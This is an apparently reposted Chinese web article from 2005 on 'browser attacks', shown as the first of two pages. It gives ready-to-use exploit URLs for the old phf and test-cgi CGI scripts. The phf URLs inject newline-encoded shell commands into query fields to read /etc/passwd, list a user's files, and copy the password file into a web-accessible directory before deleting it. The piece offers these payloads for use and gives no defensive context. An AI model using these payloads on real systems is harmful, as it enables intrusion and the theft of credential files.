浏览器攻击

作者: 来源:网络文章时间:2005-12-17 23:57:58

浏览器攻击(1)

在本章我将讲述一些利用浏览器来进行攻击的方法
1。大家都知道了phf攻击了，phf是cgi script,很多站点都有这个大漏洞啦，使用
http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd指令可以
拿到那个站点的passwd.但还有些更好的执行方法呦如：
http://thegnome.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickna ;

me=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname= ;
haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd ;
%0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/~someuser/passwd ;
http://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname ;

=haqr&Qemail=&Qnickname=&Qoffice_phone=
上面执行的命令是
id
ls -la ~someuser
cp /etc/passwd ~someuser/passwd
rm ~someuser/passwd

2。有关test攻击
http://thegnome.com/cgi-bin/test-cgi?\whatever

1.浏览器攻击(1)
2.浏览器攻击(2)

共2页 9 7 [1] [2] 8 :>

浏览器攻击相关文章：

浏览器攻击相关软件：

特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员，我们尽快予以更正。
转载请注明来源：http://www.xgdown.com